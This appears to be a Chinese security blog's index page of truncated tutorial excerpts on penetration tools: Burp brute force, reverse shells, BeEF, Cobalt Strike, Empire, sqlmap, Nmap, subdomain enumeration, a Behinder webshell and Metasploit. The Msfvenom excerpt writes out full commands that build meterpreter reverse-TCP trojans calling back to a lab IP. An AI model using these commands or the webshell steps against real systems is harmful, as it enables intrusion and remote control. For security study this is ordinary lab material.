weixin_45253622的博客

端口扫描器

在枚举用户名和密码的时候，往往会遇到很多防御措施。比如校验token,每次都需要更新token。这里记录一下绕过token限制的方法。首先使用BurpSuite抓包，发送到intruter模块，并对需要爆破的目标位置进行设置。（这里主要是为了演示绕过token限制，所以假设已知用户名为admin）给password设置字典user_token需要从页面中获取步骤：options->add->选中user_token的值。设置跟随重定向，方法如下：options->r

目录食用Linux反弹shellbash反弹加密bash反弹shell的流量Python反弹nc反弹Telnet反弹socat反弹其他命令反弹Windows反弹shellPowershell反弹nc shell使用MSF反弹shellLinux反弹shell攻击机：192.168.41.142靶机：192.168.41.138bash反弹Linux 反弹 shell 使用下面这条命令，该命令弹回来的shell是不可交互的，也就是比如vim...

masscanmasscan的扫描结果类似于nmap(一个很著名的端口扫描器)，在内部，它更像scanrand，unicornscan，and ZMap，采用了异步传输的方式。它和这些扫描器最主要的区别是，它比这些扫描器更快。而且，masscan更加灵活，它允许自定义任意的地址范和端口范围。常用参数--adapter-ip 指定发包的ip地址--adapter-port 指定发包源端口--adapter-mac 指定发包的源MAC地址--router-mac 指定网关MAC地址--ex

BeEF-XSS的使用BEEF (The Browser Exploitation Framework):一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。安装linux安装apt-get updateapt-get install beef-xss启动Apache并打开beefservice apache2 startbeef-xss #打开打开beef需要设置密码，默认密码和用户名都为beef第二个框是示例payloa

CobaltStrike的使用CobaltStrike是一款渗透测试神器，被业界人称为CS神器。CobaltSitrike分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。CobaliStrike集成了端口转发、服务扫描，自动化溢出，多模式端口监听，windows exe木马生成,windows dll木马生成，java木马生成，office宏病毒生成，木马捆绑。钓鱼攻击包括:站点克隆，目标信息获取，java 执行，浏览器自动攻击等等强大的功能！......

Empire的使用安装git clone https://github.com/EmpireProject/Empire.gitcd setup./install.sh进入Empire目录，./empire 打开Empire输入help查看帮助启动./empire

SQLMap进阶参数详解1、–level 5：探测等级

Nmap进阶脚本介绍Nmap的脚本默认存在/xx/namp/scripts文件夹下脚本分类Auth：负责处理鉴权证书(绕过鉴权)的脚本。Broadcast：在局域网内探查更多服务的开启情况，如DHCP/DNS/SQLServer等。Brute：针对常见的应用提供暴力破解方式，如HTTP/SMTP等。Default：使用-sC或-A选项扫描时默认的脚本，提供基本的脚本扫描能力。Discovery：对网络进行更多信息的搜集，如SMB枚举、SNMP查询等。Dos:用于进行拒绝服务攻击。Exp

子域名探测工具（Aquatone）Aquatone是一款子域名挖掘工具，Aquatone不仅仅只是通过简单的子域爆破，它还会利用各种开放的互联网服务和资源，来协助其完成子域枚举任务，这也大大提高了子域的爆破率。安装Aquatone作者建议使用Kali安装使用该工具，并且也只针对Kali使用过程中遇到的问题进行修复，所以这里使用最新版Kali进行安装。使用 aquatone-gather命令需要用到Nightmare.js，所以需要安装npm、electron以及Nightmare。安装 aquato

子域名查询工具（dnsenum）DNSenum是一款通过探测DNS记录在寻找子域名的工具。安装使用命令：apt-get install cpanminus 下载使用：cpanm -n Net::Whois::IPcpanm -n WWW::Mechanizecpanm -n Net::IPcpanm -n Net::DNScpanm -n Net::Netmaskcpanm -n XML::Writer下载相应的子模块。我们使用kali使用：dnsenum -h 查看帮助信息使用

一、使用CE确定扫雷棋盘地址范围：扫雷的棋盘是一个二维数组，因此棋盘格子的内存是紧挨着的，依次排列下去的。因此只要确定第一个格子的地址和最后一个格子的地址，便可以确定棋盘的地址范围了。基本方法为：每次重置棋盘后，都只点击棋盘的第一个格子，该格子会出现空白、1、2、3等多种情况，每种情况对应地址储存的内存大小是不一样的，所以根据这个思路使用ce工具。第一次点下格子，首次查找未知的初始值，重置棋盘后再次点下第一个格子，如果情况与上次一样，则查找未改变的值，若不一样则查找改变了的值，反复多次，排查结果。需要注

冰蝎运行环境安装(jre6~jre8)工具安装解压后如下：需要在文件夹内运行终端，我们新建.txt 文件，文本内容添加cmd，并将其后缀改为.bat双击运行。测试（本机）启动phpstudy访问127.0.0.1：8080成功访问。在网站根目录下创建木马文件，将冰蝎server自带shell.php内容复制进去然后使用冰蝎连接，默认密码在内容里双击目录，连接成功。首页就是phpinfo 基本信息模块命令执行虚拟终端文件管理内网渗透反弹shell这里

Msfvenom生成木马文件木马大全:安卓app:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apkLinux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elfMac:msfvenom -p osx/x8

Nmap工具使用概述：Nmap是一款开源免费的网络发现（Network Discovery）和安全审计（Security Auditing）工具，也可以说是网络检测和安全审核的工具。一般情况下，Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。测试网站的存活主机和端口信息。功能介绍：检测网络存活主机(主机发现) 扫描C段检测主机开放端口(端口发现或枚举)检测相应端口

Metasploit(MSF)MetasploitMetasploitMetasploit是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具，因此安全工作人员常用Metasploit工具来检测系统的安全性。常用payloadwindows/meterpreter/bind_tcp #正向连接windows/meterpreter/reverse_tcp #反向连接，常用windows/meterpreter/reverse_http #通过监听80端口反向

Sqlmap工具使用sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注，即可以根据返回页面判断条件真假的注入基于时间的盲注，即不能根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语句是否已经执行(即页